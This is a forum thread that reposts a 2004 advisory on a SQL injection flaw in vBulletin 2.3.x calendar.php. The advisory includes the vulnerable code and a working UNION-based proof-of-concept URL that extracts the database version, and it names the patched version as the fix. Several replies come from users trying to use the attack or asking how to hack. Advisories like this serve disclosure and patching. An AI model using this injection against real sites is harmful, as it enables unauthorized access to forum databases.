[Kynroxes]

Quote

/*
English Translation:
*/

Date of Publication: 2004-01-07 � K-OTik.COM
Title: vBulletin 2.3.x "calendar.php" SQL Injection Vulnerability
K-Otik ID : 0481
Risk : High
Remote : Yes
Local : Yes

* Technical Description - Exploit *

A vulnerability was identified in the famous forum php vBulletin. The problem is of type SQL Injection, it is in the variable "eventid" present in the file "calendar.php".

------------------------ line 585 in calendar.php ---------------------------------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid = $eventid");
-------------------------------------------------------------------------------------

---------------------------- Proof of Concept -------------------------------------
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate
-------------------------------------------------------------------------------------


* Vulnerable versions *

vBulletin version v2.3.3 and lower.


* Solution *

To use vBulletin version 2.3.4.
http://www.vbulletin.com


* Credit *

Vulnerability discovered by Qianwei Hu (January 2004).

[zero-maitimax]

a stupid question (i don't know nothing about forum's)

but how do i see what version it's using?

[clip]

on the bottom on every page.

Quote

< Contact Us - *  >

Powered by: vBulletin Version 2.2.5
Copyright �2000, 2001, Jelsoft Enterprises Limited.

[zero-maitimax]

oke tnx now i know :D

[isaiah]

i tried it and still cant get to work

[DrDoc]

Arrgg.. now i have to fix my board :\ :) thx 4 nfo.. i will tested before i secure it.. ��

Cya Doc

[The Storm]

but how to hack does anybody know an exploit or sth else?